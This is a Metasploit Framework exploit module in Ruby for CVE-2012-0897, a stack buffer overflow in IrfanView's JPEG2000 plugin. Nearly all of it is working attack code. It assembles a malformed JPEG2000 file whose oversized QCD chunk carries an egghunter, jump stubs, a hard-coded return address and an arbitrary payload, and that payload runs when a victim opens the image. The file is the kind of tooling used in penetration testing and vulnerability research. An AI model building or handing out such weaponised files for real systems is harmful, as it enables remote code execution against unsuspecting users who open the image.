##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
tested on a specific version of irfanview (v4.3.2), although other versions may
work also. The vulnerability is triggered via parsing an invalid qcd chunk
structure and specifying a malformed qcd size and data.
Payload delivery and vulnerability trigger can be executed in multiple ways.
The user can double click the file, use the file dialog, open via the icon
and drag/drop the file into Irfanview\'s window. An egg hunter is used for
stability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery
'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu
'juan vazquez' # more improvements
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2012-0897' ],
[ 'OSVDB', '78333'],
[ 'BID', '51426' ],
[ 'URL', 'http://www.greyhathacker.net/?p=525' ],
],
'Platform' => [ 'win' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 4000,
'DisableNops' => true,
},
'Targets' =>
[
# push esp; retn [i_view32.exe]
# http://www.oldapps.com/irfanview.php?old_irfanview=7097
# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
],
'DisclosureDate' => 'Jan 16 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
], self.class)
end
# encode our string like unicode except we are not using nulls
def encode_bytes(raw_bytes)
encoded_bytes = ""
0.step(raw_bytes.length-1, 2) { |i|
encoded_bytes << raw_bytes[i+1]
encoded_bytes << raw_bytes[i]
}
return encoded_bytes
end
def exploit
jp2 = ""
jp2 << "\x00\x00\x00\x0c" #
jp2 << "\x6a\x50\x20\x20" # [jP ] <0x6a502020> magic 0xd0a870a,len 12
jp2 << "\x0d\x0a\x87\x0a" #
jp2 << "\x00\x00\x00\x14" #
jp2 << "\x66\x74\x79\x70" #
jp2 << "\x6a\x70\x32\x20" #
jp2 << "\x00\x00\x00\x00" # MinorVersion = 0 = [\0\0\0\0]
jp2 << "\x6a\x70\x32\x20" # Compat = 0x6a703220 = [jp2 ]
jp2 << "\x00\x00\x00\x38" #
jp2 << "\x75\x75\x69\x64" # [uuid] <0x75756964> len 56 data offset 8
jp2 << "\x61\x70\x00\xde\xec\x87" # 56 bytes with start and end tags
jp2 << "\xd5\x11\xb2\xed\x00\x50" #
jp2 << "\x04\x71\xfd\xdc\xd2\x00" #
jp2 << "\x00\x00\x40\x01\x00\x00" #
jp2 << "\x00\x00\x00\x00\x60\x09" #
jp2 << "\x00\x00\x00\x00\x00\x00" #
jp2 << "\x00\x00\x00\x00\x00\x00" #
jp2 << "\x00\x00\x30\x00\x00\x00" #
jp2 << "\x00\x00\x00\x2d" #
jp2 << "\x6a\x70\x32\x68" # [jp2h] <0x6a703268> len 45 data offset 8
jp2 << "\x00\x00\x00\x16" #
jp2 << "\x69\x68\x64\x72" # [ihdr] <0x69686472> len 22 data offset 8
jp2 << "\x00\x00\x00\x0a" # ImageHeight = 10
jp2 << "\x00\x00\x00\x0a" # ImageWidth = 10
jp2 << "\x00\x03" # NumberOfComponents = 3
jp2 << "\x07" # BitsPerComponent = 7
jp2 << "\x07" # Compression = 7
jp2 << "\x01" # Colorspace = 0x1 = unknown
jp2 << "\x00\x00\x00\x00\x0f" #
jp2 << "\x63\x6f\x6c\x72" # [colr] <0x636f6c72> len 15 data offset 8
jp2 << "\x01" # Method = 1
jp2 << "\x00" # Precedence = 0
jp2 << "\x00" # ColorSpaceAproximation = 0
jp2 << "\x00\x00\x00" # EnumeratedColorSpace = 16 = sRGB
jp2 << "\x10\x00\x00\x00\x00" #
jp2 << "\x6a\x70\x32\x63" # [jp2c] <0x6a703263> length 0 data offset 8
jp2 << "\xff\x4f" # <0xff4f=JP2C_SOC> Start of codestream
jp2 << "\xff\x51" # <0xff51=JP2C_SIZ> length 47
jp2 << "\x00\x2f" # 47 bytes
jp2 << "\x00\x00" # Capabilities = 0
jp2 << "\x00\x00\x00\x0a" # GridWidth = 10
jp2 << "\x00\x00\x00\x0a" # GridHeight = 10
jp2 << "\x00\x00\x00\x00" # XImageOffset = 0
jp2 << "\x00\x00\x00\x00" # YImageOffset = 0
jp2 << "\x00\x00\x00\x0a" # TileWidth = 10
jp2 << "\x00\x00\x00\x0a" # TileHeight = 10
jp2 << "\x00\x00\x00\x00" # Xtileoffset = 0
jp2 << "\x00\x00\x00\x00" # Ytileoffset = 0
jp2 << "\x00\x03" # NumberOfComponents = 3
jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
jp2 << "\xff\x52" # <0xff52=JP2C_COD> length 12
jp2 << "\x00\x0c" # 12 bytes
jp2 << "\x00" # codingStyle=0=entropy coder w/o partition
jp2 << "\x00" # ProgressionOrder = 0
jp2 << "\x00\x05" # NumberOfLayers = 0x5
jp2 << "\x01" # MultiComponentTransform=0x1=5/3 reversible
jp2 << "\x05" # DecompLevels = 5
jp2 << "\x04" # CodeBlockWidthExponent=0x4+2 # cbw ->64
jp2 << "\x04" # CodeBlockHeightExponent=0x4+2 # cbh ->64
jp2 << "\x00" # CodeBLockStyle = 0
jp2 << "\x00" # QMIFBankId = 0
eggoptions =
{
:checksum => false,
:eggtag => 'pwnd'
}
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
qcd_data = ""
qcd_data << make_nops(10)
qcd_data << encode_bytes(hunter)
qcd_data << rand_text_alpha(146)
jmp_hunter = %q{
jmp $-0xad
inc ecx
}
# jump to our egghunter
jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string
qcd_data << encode_bytes(jmp_hunter)
qcd_data << rand_text_alpha(196-qcd_data.length)
qcd_data << encode_bytes([target.ret].pack("V"))
# align ecx and jmp
pivot = %q{
inc ch
jmp ecx
}
pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string
qcd_data << encode_bytes(pivot)
qcd_data << egg
jp2 << "\xff\x5c" # start
jp2 << "\x00\xf5" # arbitrary size to trigger overflow
jp2 << "\x22" # guard
jp2 << qcd_data # malicious code
jp2 << "\xff\x90" # <0xff90=JP2C_SOT>len 10
jp2 << "\x00\x0a" # 10 bytes
jp2 << "\x00\x00\x00\x00\x00\x68\x00\x01"
jp2 << "\xff\x93" # <0xff93=JP2C_SOD> Start of data
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80"
jp2 << "\xff\xd9"
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(jp2)
end
end
